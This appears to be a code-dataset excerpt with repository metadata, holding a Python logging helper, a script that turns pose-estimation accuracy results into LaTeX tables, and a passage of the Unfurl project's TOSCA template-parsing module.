     Returns a logger object that writes DEBUG and above to
     logfiles/<file_handler> and INFO and above to the console.
    Usage:
     logger = qclog.init_logger()
    Author: PRI with acknowledgement to James Cleverly
    Date: September 2016
    """
    logger = logging.getLogger(name=logger_name)
    logger.setLevel(logging.DEBUG)
    if logger.handlers:
        # already configured (repeated call / module reload): attaching the
        # handlers again would duplicate every log line
        return logger
    # create file handler; exist_ok avoids the check-then-create race of the
    # original os.path.exists()/os.makedirs() pair
    os.makedirs("logfiles", exist_ok=True)
    log_file_path = os.path.join("logfiles", file_handler)
    fh = logging.FileHandler(log_file_path)
    fh.setLevel(logging.DEBUG)
    # create console handler
    ch = logging.StreamHandler()
    ch.setLevel(logging.INFO)
    # create formatter and add to handlers
    formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s', '%H:%M:%S')
    fh.setFormatter(formatter)
    ch.setFormatter(formatter)
    # add the handlers to the logger
    logger.addHandler(fh)
    logger.addHandler(ch)
    return logger
| 32.628571 | 128 | 0.687391 | import logging
import os
def init_logger(logger_name="pfp_log", file_handler="pfp.log"):
logger = logging.getLogger(name=logger_name)
logger.setLevel(logging.DEBUG)
if not os.path.exists("logfiles"):
os.makedirs("logfiles")
log_file_path = os.path.join("logfiles", file_handler)
fh = logging.FileHandler(log_file_path)
fh.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s','%H:%M:%S')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(ch)
return logger
| true | true |
f7fa54f709934dc22d84619d9c426e01818e5efb | 1,488 | py | Python | topview/results/make_latex_accuracies.py | mmlab-cv/ICIP-2021-2346 | d208a5b89acfb0405475664bc83d289d5c3eae33 | [
"MIT"
] | 1 | 2021-08-20T11:47:33.000Z | 2021-08-20T11:47:33.000Z | topview/results/make_latex_accuracies.py | mmlab-cv/ICIP-2021-2346 | d208a5b89acfb0405475664bc83d289d5c3eae33 | [
"MIT"
] | null | null | null | topview/results/make_latex_accuracies.py | mmlab-cv/ICIP-2021-2346 | d208a5b89acfb0405475664bc83d289d5c3eae33 | [
"MIT"
] | null | null | null | import sys
sys.path.append('../../')
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import pathlib
from accuracy import *
from plot import *
def get_accuracy_for_joints(experiment, needed_acc = 0.1):
    """Load ground-truth and predicted joints for `experiment` and return the
    per-joint accuracy at the distance threshold `needed_acc` (metres).

    Reads res_files/<experiment>_gt.txt and res_files/<experiment>_predictions.txt
    next to this script.
    """
    current_file_path = pathlib.Path(__file__).parent.absolute()
    gt_file = f'{current_file_path}/res_files/{experiment}_gt.txt'
    pred_file = f'{current_file_path}/res_files/{experiment}_predictions.txt'
    gt = np.loadtxt(gt_file)
    gt = gt.reshape(gt.shape[0], -1, 3)  # (samples, joints, 3)
    pred = np.loadtxt(pred_file)
    pred = pred.reshape(pred.shape[0], -1, 3)
    dist, acc = compute_dist_acc_wrapper(pred, gt, max_dist=0.3, num=100)
    # NOTE(review): exact float equality — this only works if needed_acc falls
    # exactly on dist's grid; np.argmin(np.abs(dist - needed_acc)) would be
    # more robust. TODO confirm compute_dist_acc_wrapper's grid spacing.
    acc_ind = np.where(dist == needed_acc)
    return acc[:, acc_ind].flatten()
def create_accuracy_df_for_experiments(needed_acc=0.1):
    """Build a DataFrame with one row per experiment and columns j1..jN
    holding per-joint accuracies at threshold `needed_acc`, rounded to
    three decimals."""
    experiments = [
        "itop_itop_itop", "itop_itop_panoptic", "itop_both_panoptic",
        "panoptic_panoptic_panoptic", "panoptic_panoptic_itop",
        "panoptic_both_itop", "both_both_itop", "both_both_panoptic",
    ]

    def _row(exp):
        # one record: experiment name first, then j1..jN accuracy columns
        record = {"experiment": exp}
        for idx, value in enumerate(get_accuracy_for_joints(exp, needed_acc), start=1):
            record[f"j{idx}"] = value
        return record

    return pd.DataFrame([_row(exp) for exp in experiments]).round(3)
print("0.1m")
print(create_accuracy_df_for_experiments(0.1).to_latex())
print("0.2m")
print(create_accuracy_df_for_experiments(0.2).to_latex()) | 32.347826 | 196 | 0.691532 | import sys
sys.path.append('../../')
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import pathlib
from accuracy import *
from plot import *
def get_accuracy_for_joints(experiment, needed_acc = 0.1):
current_file_path = pathlib.Path(__file__).parent.absolute()
gt_file = f'{current_file_path}/res_files/{experiment}_gt.txt'
pred_file = f'{current_file_path}/res_files/{experiment}_predictions.txt'
gt = np.loadtxt(gt_file)
gt = gt.reshape(gt.shape[0], -1, 3)
pred = np.loadtxt(pred_file)
pred = pred.reshape(pred.shape[0], -1, 3)
dist, acc = compute_dist_acc_wrapper(pred, gt, max_dist=0.3, num=100)
acc_ind = np.where(dist == needed_acc)
return acc[:, acc_ind].flatten()
def create_accuracy_df_for_experiments(needed_acc = 0.1):
results_acc = []
for exp in ["itop_itop_itop", "itop_itop_panoptic", "itop_both_panoptic", "panoptic_panoptic_panoptic", "panoptic_panoptic_itop", "panoptic_both_itop", "both_both_itop", "both_both_panoptic"]:
exp_acc = get_accuracy_for_joints(exp, needed_acc)
res_acc = {f"j{i+1}": el for i, el in enumerate(exp_acc)}
res_acc = {
"experiment": exp,
**res_acc,
}
results_acc.append(res_acc)
df = pd.DataFrame(results_acc)
df = df.round(3)
return df
print("0.1m")
print(create_accuracy_df_for_experiments(0.1).to_latex())
print("0.2m")
print(create_accuracy_df_for_experiments(0.2).to_latex()) | true | true |
f7fa556c98600aa30c24a77fbda4680bcccf435c | 49,810 | py | Python | unfurl/tosca.py | onecommons/giterop | 9d9c6730ac5bce63f26dd1fd1e151006bc8230dd | [
"MIT"
] | null | null | null | unfurl/tosca.py | onecommons/giterop | 9d9c6730ac5bce63f26dd1fd1e151006bc8230dd | [
"MIT"
] | null | null | null | unfurl/tosca.py | onecommons/giterop | 9d9c6730ac5bce63f26dd1fd1e151006bc8230dd | [
"MIT"
] | null | null | null | # Copyright (c) 2020 Adam Souzis
# SPDX-License-Identifier: MIT
"""
TOSCA implementation
"""
import functools
import copy
from .tosca_plugins import TOSCA_VERSION
from .util import UnfurlError, UnfurlValidationError, get_base_dir, check_class_registry
from .eval import Ref, RefContext, map_value
from .result import ResourceRef, ResultsList
from .merge import patch_dict, merge_dicts
from .logs import get_console_log_level
from toscaparser.tosca_template import ToscaTemplate
from toscaparser.properties import Property
from toscaparser.elements.entity_type import EntityType
from toscaparser.elements.statefulentitytype import StatefulEntityType
import toscaparser.workflow
import toscaparser.imports
import toscaparser.artifacts
from toscaparser.common.exception import ExceptionCollector
import six
import logging
import re
from ruamel.yaml.comments import CommentedMap
logger = logging.getLogger("unfurl")
from toscaparser import functions
class RefFunc(functions.Function):
    """tosca-parser Function stub for Unfurl expression functions.

    Instead of evaluating, result() returns the unevaluated {name: args}
    mapping so it can be processed later by Unfurl's own evaluator;
    validation is skipped for the same reason.
    """

    def result(self):
        return {self.name: self.args}

    def validate(self):
        pass
for func in ["eval", "ref", "get_artifact", "has_env", "get_env"]:
functions.function_mappings[func] = RefFunc
toscaIsFunction = functions.is_function
def is_function(function):
return toscaIsFunction(function) or Ref.is_ref(function)
functions.is_function = is_function
def validate_unfurl_identifier(name):
    """True if `name` is a legal Unfurl identifier: first character a letter,
    '.' or '_', then letters, digits, '.', '_', ':' or '-'.

    Keep the pattern in sync with NamedObject in the unfurl json schema.
    """
    return bool(re.match(r"^[A-Za-z._][A-Za-z0-9._:\-]*$", name))
def encode_unfurl_identifier(name):
    """Escape every character that is illegal in an Unfurl identifier as
    "-<codepoint>-" (e.g. a space becomes "-32-"); see
    decode_unfurl_identifier for the inverse."""
    return re.sub(
        r"[^A-Za-z0-9._:\-]",
        lambda bad: f"-{ord(bad.group(0))}-",
        name,
    )
def decode_unfurl_identifier(name):
    """Reverse encode_unfurl_identifier: replace each "-<digits>-" escape with
    the character of that code point."""
    def _restore(escaped):
        return chr(int(escaped.group(1)))

    return re.sub(r"-([0-9]+)-", _restore, name)
def find_standard_interface(op):
    """Map an operation name to the TOSCA interface that defines it:
    "Standard" (node lifecycle), "Install" (Unfurl's check/discover/revert)
    or "Configure" (relationship configuration); "" when unknown."""
    if op in StatefulEntityType.interfaces_node_lifecycle_operations:
        return "Standard"
    if op in ("check", "discover", "revert"):
        return "Install"
    if op in StatefulEntityType.interfaces_relationship_configure_operations:
        return "Configure"
    return ""
@functools.lru_cache(maxsize=None)
def create_default_topology():
    """Return a (cached) minimal ToscaTemplate with one default node template
    and one default relationship template."""
    tpl = dict(
        tosca_definitions_version=TOSCA_VERSION,
        topology_template=dict(
            node_templates={"_default": {"type": "tosca.nodes.Root"}},
            relationship_templates={"_default": {"type": "tosca.relationships.Root"}},
        ),
    )
    return ToscaTemplate(yaml_dict_tpl=tpl)
def _patch(node, patchsrc, quote=False, tpl=None):
    """Apply a patch mapping to a node template's TOSCA definition in place.

    `patchsrc` is evaluated as an Unfurl expression against `node` unless
    `quote` is true, in which case it is deep-copied verbatim. `tpl`
    defaults to the node's own entity_tpl. Returns the patched dict.
    """
    if tpl is None:
        tpl = node.toscaEntityTemplate.entity_tpl
    ctx = RefContext(node, dict(template=tpl))
    # expressions may reference files relative to where the patch was declared
    ctx.base_dir = getattr(patchsrc, "base_dir", ctx.base_dir)
    if quote:
        patch = copy.deepcopy(patchsrc)
    else:
        patch = map_value(patchsrc, ctx)
    logger.trace("patching node %s was %s", node.name, tpl)
    patched = patch_dict(tpl, patch, True)
    logger.trace("patched node %s: now %s", node.name, patched)
    return patched
class ToscaSpec:
    """Wraps a parsed TOSCA service template with Unfurl's template specs
    (nodes, relationships, workflows, groups, policies)."""

    InstallerType = "unfurl.nodes.Installer"
    # the active TopologySpec; assigned by _parse_template()
    topology = None
    def evaluate_imports(self, toscaDef):
        """Filter conditional imports: drop entries in toscaDef["imports"]
        whose "when" expression does not match the current topology.

        Returns True when the imports list was modified (caller should
        reparse the template).
        """
        if not toscaDef.get("imports"):
            return False
        modified = []
        for import_tpl in toscaDef["imports"]:
            # plain imports (no "when" clause) are always kept
            if not isinstance(import_tpl, dict) or "when" not in import_tpl:
                modified.append(import_tpl)
                continue
            match = Ref(import_tpl["when"]).resolve_one(
                RefContext(self.topology, trace=0)
            )
            if match:
                logger.debug(
                    "include import of %s, match found for %s",
                    import_tpl["file"],
                    import_tpl["when"],
                )
                modified.append(import_tpl)
            else:
                logger.verbose(
                    "skipping import of %s, no match for %s",
                    import_tpl["file"],
                    import_tpl["when"],
                )
        if len(modified) < len(toscaDef["imports"]):
            # at least one conditional import was excluded
            toscaDef["imports"] = modified
            return True
        return False
    def enforce_filters(self):
        """Propagate each requirement's node_filter constraints onto its
        matched target template by patching the target's properties and
        requirements in place. Returns True when anything was patched.
        """
        patched = False
        for nodespec in self.nodeTemplates.values():
            for req in nodespec.requirements.values():
                for prop, value in req.get_nodefilter_properties():
                    # annotate the target's properties
                    target = req.relationship and req.relationship.target
                    if target and isinstance(value, dict) and 'eval' in value:
                        # bind SOURCE so the expression can refer back to the
                        # node that declared the filter
                        value.setdefault('vars', {})['SOURCE'] = dict(eval="::"+nodespec.name)
                        patch = dict(properties={prop: value})
                        _patch(target, patch, quote=True)
                        patched = True
                for name, value in req.get_nodefilter_requirements():
                    # annotate the target's requirements
                    target = req.relationship and req.relationship.target
                    if target:
                        matching_target_req = target.requirements.get(name)
                        _patch(nodespec, value, tpl=matching_target_req.entity_tpl[name])
                        patched = True
        return patched
    def _overlay(self, overlays):
        """Apply decorator overlays: for each (match expression, patch) pair
        in `overlays`, patch every template the expression matches.
        Returns the list of patched template dicts (evaluation errors are
        collected via ExceptionCollector).
        """
        def _find_matches():
            ExceptionCollector.start()  # clears previous errors
            for expression, _tpl in overlays.items():
                try:
                    match = Ref(expression).resolve_one(
                        RefContext(self.topology, trace=0)
                    )
                    if not match:
                        continue
                    if isinstance(match, (list, ResultsList)):
                        # expression matched several templates; patch each one
                        for item in match:
                            yield (item, _tpl)
                    else:
                        yield (match, _tpl)
                except:
                    ExceptionCollector.appendException(
                        UnfurlValidationError(
                            f'error evaluating decorator match expression "{expression}"',
                            log=True,
                        )
                    )
        matches = list(_find_matches())
        return [_patch(*m) for m in matches]
    def _parse_template(self, path, inputs, toscaDef, resolver):
        """Parse `toscaDef` into a ToscaTemplate and populate this spec's
        node/relationship templates, topology, workflows, groups and
        policies. Validation errors are collected, not raised here.
        """
        # need to set a path for the import loader
        self.template = ToscaTemplate(
            path=path,
            parsed_params=inputs,
            yaml_dict_tpl=toscaDef,
            import_resolver=resolver,
            verify=False,  # we display the error messages ourselves so we don't need to verify here
        )
        ExceptionCollector.collecting = True  # don't stop collecting validation errors
        ExceptionCollector.near = ' while instantiating the spec'
        self.nodeTemplates = {}
        self.installers = {}
        self.relationshipTemplates = {}
        for template in self.template.nodetemplates:
            if not template.type_definition:
                continue  # invalid template
            nodeTemplate = NodeSpec(template, self)
            if template.is_derived_from(self.InstallerType):
                self.installers[template.name] = nodeTemplate
            self.nodeTemplates[template.name] = nodeTemplate
        if hasattr(self.template, "relationship_templates"):
            # user-declared RelationshipTemplates, source and target will be None
            for template in self.template.relationship_templates:
                relTemplate = RelationshipSpec(template, self)
                self.relationshipTemplates[template.name] = relTemplate
        self.load_imported_default_templates()
        self.topology = TopologySpec(self, inputs)
        substitution_mappings = self.template.topology_template.substitution_mappings
        if substitution_mappings and substitution_mappings.node:
            self.substitution_template = self.nodeTemplates.get(substitution_mappings.node)
        else:
            self.substitution_template = None
        self.load_workflows()
        self.groups = {
            g.name: GroupSpec(g, self) for g in self.template.topology_template.groups
        }
        self.policies = {
            p.name: PolicySpec(p, self)
            for p in self.template.topology_template.policies
        }
        ExceptionCollector.collecting = False
    def _patch(self, toscaDef, path):
        """Apply decorators, conditional imports and node_filter annotations
        to `toscaDef` in place. Returns truthy when anything changed (the
        template then needs reparsing); raises UnfurlValidationError when
        decorator evaluation itself fails.
        """
        matches = None
        decorators = self.load_decorators()
        if decorators:
            logger.debug("applying decorators %s", decorators)
            # copy errors before we clear them in _overlay
            errorsSoFar = ExceptionCollector.exceptions[:]
            # overlay uses ExceptionCollector
            matches = self._overlay(decorators)
            if ExceptionCollector.exceptionsCaught():
                # abort if overlay caused errors
                # report previously collected errors too
                ExceptionCollector.exceptions[:0] = errorsSoFar
                message = "\n".join(
                    ExceptionCollector.getExceptionsReport(
                        full=(get_console_log_level() < logging.INFO)
                    )
                )
                raise UnfurlValidationError(
                    f"TOSCA validation failed for {path}: \n{message}",
                    ExceptionCollector.getExceptions(),
                )
        modified_imports = self.evaluate_imports(toscaDef)
        annotated = self.enforce_filters()
        return matches or modified_imports or annotated
    def __init__(
        self, toscaDef, spec=None, path=None, resolver=None, skip_validation=False
    ):
        """Build a ToscaSpec from a service template.

        `toscaDef` is a dict or an already-parsed ToscaTemplate. `spec`
        optionally supplies inputs plus instance/installer declarations.
        Raises UnfurlValidationError on validation failures unless
        `skip_validation` is true (then they are only logged).
        """
        self.discovered = None
        if spec:
            inputs = spec.get("inputs")
        else:
            inputs = None
        if isinstance(toscaDef, ToscaTemplate):
            # already parsed; use as-is
            self.template = toscaDef
        else:
            self.template = None
            topology_tpl = toscaDef.get("topology_template")
            if not topology_tpl:
                toscaDef["topology_template"] = dict(
                    node_templates={}, relationship_templates={}
                )
            if spec:
                self.load_instances(toscaDef, spec)
            logger.info("Validating TOSCA template at %s", path)
            try:
                self._parse_template(path, inputs, toscaDef, resolver)
            except:
                if not ExceptionCollector.exceptionsCaught() or not self.template or not self.topology:
                    raise  # unexpected error
                # validation failed: apply decorators/conditional imports and
                # retry before giving up
                patched = self._patch(toscaDef, path)
                if patched:
                    # overlay and evaluate_imports modifies toscaDef in-place, try reparsing it
                    self._parse_template(path, inputs, toscaDef, resolver)
            if ExceptionCollector.exceptionsCaught():
                message = "\n".join(
                    ExceptionCollector.getExceptionsReport(
                        full=(get_console_log_level() < logging.INFO)
                    )
                )
                if skip_validation:
                    logger.warning("Found TOSCA validation failures: %s", message)
                else:
                    raise UnfurlValidationError(
                        f"TOSCA validation failed for {path}: \n{message}",
                        ExceptionCollector.getExceptions(),
                    )
@property
def base_dir(self):
if self.template.path is None:
return None
return get_base_dir(self.template.path)
    def _get_project_dir(self, home=False):
        """Return the root directory of the current (or, with home=True, the
        home) Unfurl project, or None when not running inside a project."""
        # hacky: reach through the import resolver to the manifest's localEnv
        if self.template.import_resolver:
            manifest = self.template.import_resolver.manifest
            if manifest.localEnv:
                if home:
                    if manifest.localEnv.homeProject:
                        return manifest.localEnv.homeProject.projectRoot
                elif manifest.localEnv.project:
                    return manifest.localEnv.project.projectRoot
        return None
    def add_node_template(self, name, tpl, discovered=True):
        """Dynamically add a node template to the topology.

        When `discovered` is true the tpl is also recorded in
        self.discovered so it can be serialized back into the manifest.
        Returns the new NodeSpec.
        """
        custom_types = None
        if "custom_types" in tpl:
            custom_types = tpl.pop("custom_types")
            if custom_types:
                # XXX check for conflicts, throw error
                self.template.topology_template.custom_defs.update(custom_types)
        nodeTemplate = self.template.topology_template.add_template(name, tpl)
        nodeSpec = NodeSpec(nodeTemplate, self)
        self.nodeTemplates[name] = nodeSpec
        if discovered:
            if self.discovered is None:
                self.discovered = CommentedMap()
            self.discovered[name] = tpl
            # add custom_types back for serialization later
            if custom_types:
                tpl["custom_types"] = custom_types
        return nodeSpec
    def load_decorators(self):
        """Collect the "decorators" sections from all nested (imported)
        templates plus the main template into one mapping; the main
        template's section is merged last."""
        decorators = CommentedMap()
        for path, import_tpl in self.template.nested_tosca_tpls.items():
            imported = import_tpl.get("decorators")
            if imported:
                decorators = merge_dicts(decorators, imported)
        decorators = merge_dicts(decorators, self.template.tpl.get("decorators") or {})
        return decorators
    def load_imported_default_templates(self):
        """Add node templates marked with the "default" directive from
        imported (nested) topologies unless a template with that name
        already exists."""
        for name, topology in self.template.nested_topologies.items():
            for nodeTemplate in topology.nodetemplates:
                if (
                    "default" in nodeTemplate.directives
                    and nodeTemplate.name not in self.nodeTemplates
                ):
                    nodeSpec = NodeSpec(nodeTemplate, self)
                    self.nodeTemplates[nodeSpec.name] = nodeSpec
    def load_workflows(self):
        """Build self._workflows: workflow name -> list of Workflow wrappers
        from the main topology and every nested topology."""
        # we want to let different types defining standard workflows like deploy
        # so we need to support importing workflows
        workflows = {
            name: [Workflow(w)]
            for name, w in self.template.topology_template.workflows.items()
        }
        for topology in self.template.nested_topologies.values():
            for name, w in topology.workflows.items():
                # imported workflows with the same name are appended, not replaced
                workflows.setdefault(name, []).append(Workflow(w))
        self._workflows = workflows
def get_workflow(self, workflow):
# XXX need api to get all the workflows with the same name
wfs = self._workflows.get(workflow)
if wfs:
return wfs[0]
else:
return None
    def get_repository_path(self, repositoryName, file=""):
        """Resolve a repository name (plus optional relative `file`) to a
        local filesystem path, or None when the repository isn't defined."""
        baseArtifact = ArtifactSpec(
            dict(repository=repositoryName, file=file), spec=self
        )
        if baseArtifact.repository:
            # may resolve repository url to local path (e.g. checkout a remote git repo)
            return baseArtifact.get_path()
        else:
            return None
    def get_template(self, name):
        """Look up a template spec by its (possibly compound) name.

        Special name forms:
          "~topology"              -> the TopologySpec
          "node~c~cap"             -> a capability of a node template
          "node~r~req" / "~r~name" -> a relationship (by requirement / by name)
          "node~q~req"             -> a requirement of a node template
          "node~a~art" / "~a~art"  -> an artifact (possibly anonymous/inline)
        Anything else is treated as a node template name. Returns None when
        not found.
        """
        if name == "~topology":
            return self.topology
        elif "~c~" in name:
            nodeName, capability = name.split("~c~")
            nodeTemplate = self.nodeTemplates.get(nodeName)
            if not nodeTemplate:
                return None
            return nodeTemplate.get_capability(capability)
        elif "~r~" in name:
            nodeName, requirement = name.split("~r~")
            if nodeName:
                nodeTemplate = self.nodeTemplates.get(nodeName)
                if not nodeTemplate:
                    return None
                return nodeTemplate.get_relationship(requirement)
            else:
                # NOTE(review): relationshipTemplates is keyed by plain template
                # names, but the full "~r~"-prefixed name is looked up here —
                # looks like this should be .get(requirement); confirm.
                return self.relationshipTemplates.get(name)
        elif "~q~" in name:
            nodeName, requirement = name.split("~q~")
            nodeTemplate = self.nodeTemplates.get(nodeName)
            if not nodeTemplate:
                return None
            return nodeTemplate.get_requirement(requirement)
        elif "~a~" in name:
            nodeTemplate = None
            nodeName, artifactName = name.split("~a~")
            if nodeName:
                nodeTemplate = self.nodeTemplates.get(nodeName)
                if not nodeTemplate:
                    return None
                artifact = nodeTemplate.artifacts.get(artifactName)
                if artifact:
                    return artifact
            # its an anonymous artifact, create inline artifact
            tpl = self._get_artifact_spec_from_name(artifactName)
            # tpl is a dict or a tosca artifact
            return ArtifactSpec(tpl, nodeTemplate, spec=self)
        else:
            return self.nodeTemplates.get(name)
def _get_artifact_declared_tpl(self, repositoryName, file):
# see if this is declared in a repository node template with the same name
repository = self.nodeTemplates.get(repositoryName)
if repository:
artifact = repository.artifacts.get(file)
if artifact:
return artifact.toscaEntityTemplate.entity_tpl.copy()
return None
def _get_artifact_spec_from_name(self, name):
repository, sep, file = name.partition(":")
file = decode_unfurl_identifier(file)
artifact = self._get_artifact_declared_tpl(repository, file)
if artifact:
return artifact
spec = CommentedMap(file=file)
if repository:
spec["repository"] = repository
return spec
def is_type_name(self, typeName):
return (
typeName in self.template.topology_template.custom_defs
or typeName in EntityType.TOSCA_DEF
)
def find_matching_templates(self, typeName):
for template in self.nodeTemplates.values():
if template.is_compatible_type(typeName):
yield template
    def load_instances(self, toscaDef, tpl):
        """Create node templates for instances/installers declared in the spec.

        Mutates *toscaDef*'s ``node_templates`` (and possibly ``types``) in place.

        .. code-block:: YAML

          spec:
            instances:
              test:
                installer: test
            installers:
              test:
                operations:
                  default:
                    implementation: TestConfigurator
                    inputs:
        """
        node_templates = toscaDef["topology_template"]["node_templates"]
        for name, impl in tpl.get("installers", {}).items():
            if name not in node_templates:
                node_templates[name] = dict(type=self.InstallerType, properties=impl)
            else:
                raise UnfurlValidationError(
                    f'can not add installer "{name}", there is already a node template with that name'
                )
        for name, impl in tpl.get("instances", {}).items():
            if name not in node_templates and isinstance(impl, dict):
                # add this as a template
                if "template" not in impl:
                    node_templates[name] = self.instance_to_template(impl.copy())
                elif isinstance(impl["template"], dict):
                    # an inline template was given; use it directly
                    node_templates[name] = impl["template"]
        if "discovered" in tpl:
            # node templates added dynamically by configurators
            self.discovered = tpl["discovered"]
            for name, impl in tpl["discovered"].items():
                if name not in node_templates:
                    custom_types = impl.pop("custom_types", None)
                    node_templates[name] = impl
                    if custom_types:
                        # XXX check for conflicts, throw error
                        toscaDef.setdefault("types", CommentedMap()).update(
                            custom_types
                        )
def instance_to_template(self, impl):
if "type" not in impl:
impl["type"] = "unfurl.nodes.Default"
installer = impl.pop("install", None)
if installer:
impl["requirements"] = [{"install": installer}]
return impl
    def import_connections(self, importedSpec):
        """Copy relationship templates from *importedSpec* as default connections.

        Templates without an explicit ``default_for`` are treated as applying
        to any target; existing templates with the same name take precedence.
        """
        # user-declared relationship templates, source and target will be None
        for template in importedSpec.template.relationship_templates:
            if not template.default_for:
                # assume its default relationship template
                template.default_for = "ANY"
            relTemplate = RelationshipSpec(template, self)
            if template.name not in self.relationshipTemplates:  # not defined yet
                self.relationshipTemplates[template.name] = relTemplate
def find_props(attributes, propertyDefs, matchfn):
    """Recursively yield (name, value) pairs from *attributes* whose property
    definition's datatype satisfies *matchfn*.

    *matchfn* is called with the property's entry-schema entity (for map/list
    properties) or its entity type.  Complex datatypes and map/list entries
    are descended into when they don't match directly.  List entries that
    match are yielded with ``None`` as the name.
    """
    if not attributes:
        return
    for propdef in propertyDefs.values():
        if propdef.name not in attributes:
            continue
        match = matchfn(propdef.entry_schema_entity or propdef.entity)
        if not propdef.entry_schema and not propdef.entity.properties:
            # it's a simple value type
            if match:
                yield propdef.name, attributes[propdef.name]
            continue
        if not propdef.entry_schema:
            # it's complex datatype
            value = attributes[propdef.name]
            if match:
                yield propdef.name, value
            elif value:
                # descend into its properties
                for name, v in find_props(value, propdef.entity.properties, matchfn):
                    yield name, v
            continue
        # from here on the property is a map or list with an entry schema
        properties = propdef.entry_schema_entity.properties
        if not match and not properties:
            # entries are simple value types and didn't match
            continue
        value = attributes[propdef.name]
        if not value:
            continue
        if propdef.type == "map":
            for key, val in value.items():
                if match:
                    yield key, val
                elif properties:
                    for name, v in find_props(val, properties, matchfn):
                        yield name, v
        elif propdef.type == "list":
            for val in value:
                if match:
                    yield None, val
                elif properties:
                    for name, v in find_props(val, properties, matchfn):
                        yield name, v
# represents a node, capability or relationship
class EntitySpec(ResourceRef):
    """Base class wrapping a toscaparser entity template (node, capability,
    relationship, artifact, group, policy or topology).

    Exposes the template's properties/attributes, its TOSCA type, and helpers
    for matching types and finding artifacts.
    """
    # XXX need to define __eq__ for spec changes
    def __init__(self, toscaNodeTemplate, spec=None):
        # toscaNodeTemplate: the underlying toscaparser entity template
        # spec: the owning ToscaSpec (may be None in tests)
        self.toscaEntityTemplate = toscaNodeTemplate
        self.spec = spec
        self.name = toscaNodeTemplate.name
        if not validate_unfurl_identifier(self.name):
            ExceptionCollector.appendException(
                UnfurlValidationError(
                    f'"{self.name}" is not a valid TOSCA template name',
                    log=True,
                )
            )
        self.type = toscaNodeTemplate.type
        self._isReferencedBy = [] # this is referenced by another template or via property traversal
        # nodes have both properties and attributes
        # as do capability properties and relationships
        # but only property values are declared
        # XXX user should be able to declare default attribute values
        self.propertyDefs = toscaNodeTemplate.get_properties()
        self.attributeDefs = {}
        # XXX test_helm.py fails without making a deepcopy
        # some how chart_values is being modifying outside of a task transaction
        self.properties = copy.deepcopy(
            CommentedMap(
                [(prop.name, prop.value) for prop in self.propertyDefs.values()]
            )
        )
        if toscaNodeTemplate.type_definition:
            # add attributes definitions
            attrDefs = toscaNodeTemplate.type_definition.get_attributes_def()
            self.defaultAttributes = {
                prop.name: prop.default
                for prop in attrDefs.values()
                if prop.name not in ["tosca_id", "state", "tosca_name"]
            }
            for name, aDef in attrDefs.items():
                prop = Property(
                    name, aDef.default, aDef.schema, toscaNodeTemplate.custom_def
                )
                self.propertyDefs[name] = prop
                self.attributeDefs[name] = prop
            # now add any property definitions that haven't been defined yet
            # i.e. missing properties without a default and not required
            props_def = toscaNodeTemplate.type_definition.get_properties_def()
            for pDef in props_def.values():
                if pDef.schema and pDef.name not in self.propertyDefs:
                    self.propertyDefs[pDef.name] = Property(
                        pDef.name,
                        pDef.default,
                        pDef.schema,
                        toscaNodeTemplate.custom_def,
                    )
        else:
            self.defaultAttributes = {}
    def _resolve(self, key):
        """Make attributes available to expressions"""
        if key in ["name", "type", "uri", "groups", "policies"]:
            return getattr(self, key)
        raise KeyError(key)
    def get_interfaces(self):
        return self.toscaEntityTemplate.interfaces
    def get_interface_requirements(self):
        return self.toscaEntityTemplate.type_definition.get_interface_requirements(
            self.toscaEntityTemplate.entity_tpl
        )
    @property
    def groups(self):
        """Yield the GroupSpecs this template is a member of."""
        if not self.spec:
            return
        for g in self.spec.groups.values():
            if self.name in g.members:
                yield g
    @property
    def policies(self):
        # subclasses (NodeSpec, GroupSpec) override with real lookups
        return []
    def is_compatible_target(self, targetStr):
        """True if this template's name or type matches *targetStr*."""
        if self.name == targetStr:
            return True
        return self.toscaEntityTemplate.is_derived_from(targetStr)
    def is_compatible_type(self, typeStr):
        return self.toscaEntityTemplate.is_derived_from(typeStr)
    @property
    def uri(self):
        return self.get_uri()
    def get_uri(self):
        # subclasses return mangled names (see ToscaSpec.get_template())
        return self.name # XXX
    def __repr__(self):
        return f"{self.__class__.__name__}('{self.name}')"
    @property
    def artifacts(self):
        # only nodes (and entities that delegate to a node) have artifacts
        return {}
    @staticmethod
    def get_name_from_artifact_spec(artifact_tpl):
        """Derive a unique name for an (possibly anonymous) artifact tpl."""
        name = artifact_tpl.get(
            "name", encode_unfurl_identifier(artifact_tpl.get("file", ""))
        )
        repository_name = artifact_tpl.get("repository", "")
        if repository_name:
            return repository_name + "--" + name
        else:
            return name
    def find_or_create_artifact(self, nameOrTpl, path=None, predefined=False):
        """Resolve *nameOrTpl* (an artifact name or inline tpl) to an ArtifactSpec.

        Looks in this template's declared artifacts, then in matching local
        repository templates, finally falling back to treating the name as a
        file path or URL.  Returns None for empty input or (with
        ``predefined=True``) an unknown name.
        """
        if not nameOrTpl:
            return None
        if isinstance(nameOrTpl, six.string_types):
            name = nameOrTpl
            artifact = self.artifacts.get(nameOrTpl)
            if artifact:
                return artifact
            repositoryName = ""
        else:
            # inline, anonymous templates can only specify a file and repository
            # because ArtifactInstance don't have way to refer to the inline template
            # and only encode the file and repository in get_name_from_artifact_spec()
            tpl = nameOrTpl
            name = nameOrTpl["file"]
            repositoryName = nameOrTpl.get("repository")
        # if the artifact is defined in a repository, make a copy of it
        if not repositoryName:
            # see if artifact is declared in local repository
            for localStore in self.spec.find_matching_templates(
                "unfurl.nodes.LocalRepository"
            ):
                artifact = localStore.artifacts.get(name)
                if artifact:
                    # found, make a inline copy
                    tpl = artifact.toscaEntityTemplate.entity_tpl.copy()
                    tpl["name"] = name
                    tpl["repository"] = localStore.name
                    break
            else:
                if predefined and not check_class_registry(name):
                    logger.warning(f"no artifact named {name} found")
                    return None
                # otherwise name not found, assume it's a file path or URL
                tpl = dict(file=name)
        else:
            # see if this is declared in a repository node template with the same name
            artifact_tpl = self.spec._get_artifact_declared_tpl(repositoryName, name)
            if artifact_tpl:
                tpl = artifact_tpl
                tpl["repository"] = repositoryName
        # create an anonymous, inline artifact
        return ArtifactSpec(tpl, self, path=path)
    @property
    def abstract(self):
        # NodeSpec overrides: returns "select"/"substitute" for abstract nodes
        return None
    @property
    def directives(self):
        return []
    def find_props(self, attributes, matchfn):
